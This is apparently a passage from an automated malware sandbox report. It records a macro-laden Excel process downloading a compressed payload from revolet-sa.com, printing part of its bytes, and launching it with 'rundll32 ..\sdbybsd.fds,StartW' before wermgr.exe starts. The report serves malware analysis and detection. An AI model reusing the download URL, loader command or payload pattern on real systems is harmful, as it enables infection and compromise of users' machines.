                                Apr 7, 2021 05:54:07.893683910 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.045336962 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045422077 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045439959 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045598984 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045603991 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.045627117 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045644045 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045715094 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.045787096 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045804024 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045819998 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045836926 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045852900 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045866966 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.045870066 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045893908 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.045927048 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.045964003 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045980930 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.045998096 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.046015978 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.046041012 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.046063900 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.046128988 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.046145916 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.046161890 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.046179056 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.046183109 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.046219110 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.048851013 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.206753016 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.206813097 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.206845999 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.206876993 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.207096100 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.208825111 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.208884001 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.208992004 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209228992 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209273100 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209276915 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209287882 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209312916 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209328890 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209352970 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209372044 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209403038 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209481001 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209527016 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209546089 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209574938 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209577084 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209619999 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209634066 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209660053 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209666967 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209713936 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209717035 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209757090 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209773064 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209796906 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209813118 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209836006 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209850073 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209877014 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209889889 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209914923 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209930897 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.209964037 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.209969997 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.210005999 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.210026026 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.210046053 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.210057974 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.210087061 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:08.210103035 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:08.210128069 CEST8049167192.232.249.186192.168.2.22

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Apr 7, 2021 05:54:07.238785028 CEST5219753192.168.2.228.8.8.8
                                Apr 7, 2021 05:54:07.251486063 CEST53521978.8.8.8192.168.2.22

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Apr 7, 2021 05:54:07.238785028 CEST192.168.2.228.8.8.80x1168Standard query (0)revolet-sa.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Apr 7, 2021 05:54:07.251486063 CEST8.8.8.8192.168.2.220x1168No error (0)revolet-sa.com192.232.249.186A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • revolet-sa.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249167192.232.249.18680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                TimestampkBytes transferredDirectionData
                                Apr 7, 2021 05:54:07.430265903 CEST0OUTGET /files/countryyelow.php HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: revolet-sa.com
                                Connection: Keep-Alive
                                Apr 7, 2021 05:54:07.883936882 CEST2INHTTP/1.1 200 OK
                                Date: Wed, 07 Apr 2021 03:54:07 GMT
                                Server: Apache
                                Content-Disposition: attachment; filename="ySiCz.fbx"
                                Upgrade: h2,h2c
                                Connection: Upgrade, Keep-Alive
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Keep-Alive: timeout=5, max=75
                                Transfer-Encoding: chunked
                                Content-Type: application/octet-stream
                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 72 7f 60 53 d5 dd f7 49 72 9b 5e da 94 dc 62 a3 55 aa d6 c7 b8 e1 40 45 83 0a 6f c1 55 ed 2d 6c 23 78 af 91 04 84 b6 fa 08 31 de b9 0d 35 17 70 52 2c 0b d5 de 1d e2 d8 86 cf dc 04 05 c5 4d 37 37 9d 43 ed 36 27 a1 ed 5a 3a 19 a2 22 14 01 ad 5a f5 60 a3 06 a9 50 34 70 de ef b9 37 c9 4d 42 da 3d ef df af 85 dc 7b ee f9 7e 3e df 1f 9f ef c7 7b e3 5a 64 43 08 71 f0 a3 14 a1 76 64 fc d5 a2 ff fc 37 0c bf b1 e7 fe 6d 2c da 32 e6 df e7 b5 5b 66 ff fb bc 1b 42 b7 dd 55 bd e4 ce 1f dd 7a e7 cd 3f a8 be e5 e6 1f fe f0 47 e1 ea ff 5e 5c 7d a7 fa c3 ea db 7e 58 5d 77 9d af fa 07 3f 5a b4 f8 e2 b2 b2 12 77 2a c7 c9 eb ba e7 fc ed e2 27 cf 4e ff e2 97 fe fd ec 47 53 e7 07 e1 d7 07 df 4f e9 df 4f 9d 7d db 25 4f 9e 3d ed b2 df 9e bd 09 be af bf f4 b1 b3 cf d3 df 8f 9f 3d 11 de d6 09 7f 3a fb ef fa f7 d3 c6 fb b6 5b 42 2c c7 48 bd 4b 22 42 b3 2d 76 f4 cb ef dd 7e 53 fa ae 1f 8d 3d af 14 ee 50 0b a8 51 6b d7 ef ae 9a 6a 41 48 80 c3 5a a6 10 9c 04 fd a9 eb 85 90 f9 46 bb 4a 0c 1c fc 59 91 01 35 be 85 cc 3d 7b d5 de 5c 84 7c fa 97 1d 71 16 a4 d7 79 52 c8 64 31 ff 6e 2a 41 8b 1a 8d ba 55 ff 8b 5d a4 ff 2a c6 d8 91 c0 8f 1c bf 38 bc 78 79 18 de 57 a8 9c d1 50 0b 97 e9 2f fd 57 0d d5 2f be 73 d1 cd e1 9b 11 fa e5 6b 46 0f 20 4e 5a 83 cc 5f 2d fc bf d8 80 a1 27 57 c3 63 49 91 61 1c f6 ce c5 c5 2e be cd 00 56 5e ca 6e ec 06 ee d9 02 b8 3b ef ba f3 16 96 4f 48 ed a0 1a de 89 53 70 b5 17 df b9 f8 f6 1f 01 f0 e2 c5 48 d7 0a 2d 81 b7 50 92 8f bb 66 64 25 be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff fe ff fa 6b ff 4b 13 27 90 1b ab 2d 48 96 37 ad 59 59 24 44 16 c7 91 5f 13 13 8a 25 2a 26 1a 25 85 57 90 a6 26 c9 be a9 1c c2 5e 1e ee 24 72 d1 56 2b dc c5 5b 16 27 51 d4 9b 20 4f 6d b3 42 68 08 8b 7c e3 22 ad 8c 25 ed ed e0 10 0d bb 39 46 96 c9 df 80 1a e9 12 e0 6e 2e 8e cb 72 54 1c 96 14 bb 62 25 f7 b1 94 22 8f bd c3 1a 3c 92 da 2c 2e c3 83 b0 4c 7e 92 c3 8b 8a 49 49 29 55 6c e4 3a 9d 96 ec ed d4 91 70 23 93 79 85 90 1c b9 20 0f c9 c9 e4 e2 42 c8 22 f2 d5 95 b9 c8 22 99 70 85 90 76 f2 5a 1e d2 2e 93 b7 ae cc 45 9e 94 14 ab 52 4c 7e 07 d7 41 2c 9e ec ed 74 6e ad 73 73 fa a5 4c fe 58 08 cc 93 1f 9f 0a e6 65 d2 92 01 b7 f7 b2 35 fd e5 1c 58 93 5f 99 4e 7e c5 db 10 4e cc d7 d4 84 27 56 93 d0 c4 64 d8 89 77 92 77 7a ac a8 c7 3e 75 2d 27 e0 6e 58 48 66 1b 9d 50 ca 13 93 24 89 aa 55 54 ad a4 6a 05 55 05 aa 3a 42 09 80 92 f5 21 84 1a 3a aa 90 1f 1f 26 15 00 3f 5a e7 e6 2d e1 62 3f 59 00 45 e6 e3 ee 46 28 7f a8 e9 75 2b 6a af 06 78 67 4a 0d 05 31 3d ac 8a 45 26 37 58 6c 4c 92 48 57 a5 a1 4a a8 fa 8e 22 41 41 f0 8f 63 e1 cb 21 1c e9 aa 32 85 4c 53 61 c5 67 e6 53 dd 26 15 c2 5f a2 02 54 1b 50 61 e7 6f a3 3c ea 04 93 0a e1 ad 79 d4 93 8c 0a 35 99 09 1e 87 18 13 5b e7 1a 7a 87 26 99 6c 40 ac 1a 89 0d c6 58 5c 80 3d d9 64 03 e2 da 0c bb fd 08 5b 5b b2 0a d6 26 6f 5a b3 b2 48 88 2c 8e 23 bf 26 26 14 4b 54 4c 34 b2 ac 3c 64 b5 cb 9a 9a 24 0e 36 91 97 87 bc 10 93 48 cf df ad 48 53 e3 2d 8b 93 28 ea 4d 90 6b 5f b6 42 74 08 8b 7c 66 af 50 40 9f 7c 8a 59 1d
                                Data Ascii: 1faar`SIr^bU@EoU-l#x15pR,M77C6'Z:"Z`P4p7MB={~>{ZdCqvd7m,2[fBUz?G^\}~X]w?Zw*'NGSOO}%O==:[B,HK"B-v~S=PQkjAHZFJY5={\|qyRd1n*AU]*8xyWP/W/skF NZ_-'WcIa.V^n;OHSpH-Pfd%kK'-H7YY$D_%*&%W&^$rV+['Q OmBh|"%9Fn.rTb%"<,.L~II)Ul:p#y B""pvZ.ERL~A,tnssLXe5X_N~N'Vdwwz>u-'nXHfP$UTjU:B!:&?Z-b?YEF(u+jxgJ1=E&7XlLHWJ"AAc!2LSagS&_TPao<y5[z&l@X\=d[[&oZH,#&&KTL4<d$6HHS-(Mk_Bt|fP@|Y


                                Code Manipulations

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:05:53:35
                                Start date:07/04/2021
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                Imagebase:0x13f810000
                                File size:27641504 bytes
                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:05:53:40
                                Start date:07/04/2021
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32 ..\sdbybsd.fds,StartW
                                Imagebase:0xfff10000
                                File size:45568 bytes
                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:05:53:40
                                Start date:07/04/2021
                                Path:C:\Windows\SysWOW64\rundll32.exe
                                Wow64 process (32bit):true
                                Commandline:rundll32 ..\sdbybsd.fds,StartW
                                Imagebase:0x550000
                                File size:44544 bytes
                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:05:53:41
                                Start date:07/04/2021
                                Path:C:\Windows\System32\wermgr.exe
                                Wow64 process (32bit):
                                Commandline:C:\Windows\system32\wermgr.exe
                                Imagebase:
                                File size:50688 bytes
                                MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Disassembly

                                Code Analysis

                                Reset < >